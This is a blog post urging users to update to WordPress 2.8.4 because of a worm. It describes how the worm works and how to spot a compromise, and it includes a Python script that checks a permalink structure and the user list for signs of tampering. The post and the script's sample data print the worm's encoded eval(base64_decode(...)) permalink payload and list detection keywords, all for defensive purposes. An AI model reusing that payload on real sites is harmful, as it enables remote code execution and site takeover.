[Security] Update Your WordPress Blog To WordPress 2.8.4 Now

Older WordPress versions (anything earlier than WordPress 2.8.4) are currently under attack by a “worm” circulating on the internet, which has already affected many websites running older versions of WordPress.

As per a recent post on the WordPress blog, this is how the worm operates:

Right now there is a worm making its way around old, unpatched versions of WordPress. This particular worm, like many before it, is clever: it registers a user, uses a security bug (fixed earlier in the year) to allow evaluated code to be executed through the permalink structure, makes itself an admin, then uses JavaScript to hide itself when you look at users page, attempts to clean up after itself, then goes quiet so you never notice while it inserts hidden spam and malware into your old posts.

Wordpress 2.8.4, the current version of WordPress, is immune to this worm. (So was the release before this one.) If you’ve been thinking about upgrading but haven’t gotten around to it yet, now would be a really good time. If you’ve already upgraded your blogs, maybe check out the blogs of your friends or that you read and see if they need any help. A stitch in time saves nine.

If you are using a WordPress installation that is not the latest release, a nag screen in the WordPress admin panel should already be prompting you to upgrade. WordPress 2.7 and later have an auto-upgrade capability, so if your blog or website runs an older version, it's time to upgrade now.

How To Know If Your WordPress Site Has Already Been Attacked

There are two clues that your WordPress site has been attacked.

The first clue is strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords to look for are “eval” and “base64_decode”.

The second clue is that a “back door” was created in the form of a “hidden” Administrator account. Check your site's users for “Administrator (2)” or a name you do not recognize.
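Because the worm hides its user with JavaScript on the admin users page, the two clues above are best checked against the raw data rather than the dashboard. The script below is an added example, not code from the original post or from the WordPress project. It assumes you have already exported the permalink structure (the `permalink_structure` row in `wp_options`) and a list of users with their role (from `wp_users` joined to the `wp_capabilities` row in `wp_usermeta`); the sample inputs embedded here are constructed for the demonstration, with the tampered permalink copied from the post. It goes slightly beyond the post by percent-decoding the structure before matching and by flagging any characters that are not part of a legitimate WordPress permalink tag.

```python
"""Offline checks for the two indicators described in the post:
a tampered permalink structure and an unexpected administrator account."""
import re
from urllib.parse import unquote

# Indicator strings named in the post ("eval", "base64_decode") plus the PHP
# superglobal the sample permalink reads its payload from.
INDICATORS = ("eval", "base64_decode", "$_SERVER")

# Placeholder tags WordPress itself accepts in a permalink structure.
VALID_TAGS = {"%year%", "%monthnum%", "%day%", "%hour%", "%minute%",
              "%second%", "%post_id%", "%postname%", "%category%", "%author%"}


def fully_unquote(value: str) -> str:
    """Percent-decode until the string stops changing, so single- or
    double-encoded content is inspected in its decoded form."""
    previous = None
    while value != previous:
        previous, value = value, unquote(value)
    return value


def permalink_findings(structure: str) -> list[str]:
    """Return the reasons the permalink structure looks tampered with
    (an empty list means it looks clean)."""
    decoded = fully_unquote(structure)
    reasons = [f"contains '{ind}'" for ind in INDICATORS if ind in decoded]
    # After removing the legitimate tags, only plain path text should remain.
    stripped = decoded
    for tag in VALID_TAGS:
        stripped = stripped.replace(tag, "")
    if re.search(r"[^A-Za-z0-9/_.\-]", stripped):
        reasons.append("unexpected characters outside WordPress permalink tags")
    return reasons


def unexpected_admins(users, known_admin_logins):
    """Flag administrator rows whose login is not on the allow-list you
    maintain, or whose name matches the 'Administrator (2)' pattern.
    `users` is an iterable of dicts with user_login, display_name and role."""
    findings = []
    for user in users:
        if user["role"] != "administrator":
            continue
        reasons = []
        if user["user_login"] not in known_admin_logins:
            reasons.append("admin login not in the known list")
        names = (user["user_login"], user["display_name"])
        if any(re.fullmatch(r"administrator\s*\(\d+\)", n, re.I) for n in names):
            reasons.append("name matches 'Administrator (n)'")
        if reasons:
            findings.append((user["user_login"], reasons))
    return findings


# Constructed sample data. The tampered structure is the one shown in the post.
CLEAN_PERMALINK = "/%year%/%monthnum%/%postname%/"
TAMPERED_PERMALINK = ("/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))"
                      "%7D%7D|.+)&%/")
SAMPLE_USERS = [
    {"user_login": "siteowner", "display_name": "Site Owner", "role": "administrator"},
    {"user_login": "reader42", "display_name": "Reader", "role": "subscriber"},
    {"user_login": "administrator-2", "display_name": "Administrator (2)",
     "role": "administrator"},
]
KNOWN_ADMINS = {"siteowner"}  # the admins you created yourself (assumed)

if __name__ == "__main__":
    for label, structure in (("clean", CLEAN_PERMALINK), ("tampered", TAMPERED_PERMALINK)):
        print(f"permalink ({label}):", permalink_findings(structure) or "no findings")
    for login, reasons in unexpected_admins(SAMPLE_USERS, KNOWN_ADMINS):
        print(f"suspicious admin {login!r}: {'; '.join(reasons)}")
```

Run it against your own exported values in place of the constructed samples. The decoding step matters because the injected structure is stored percent-encoded, so a naive search for `eval` in the raw option value can miss it; the character allow-list catches variants that rename the functions but still need braces, parentheses and `$` to execute.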

WordPress.com blogs are not impacted, as they are kept up to date. Only versions prior to WordPress 2.8.4 are impacted.

If you have pertinent information that will help the WordPress team track down and stop this attack, please report it to security@wordpress.org.

You can also follow me on Twitter at http://twitter.com/vaibhav1981

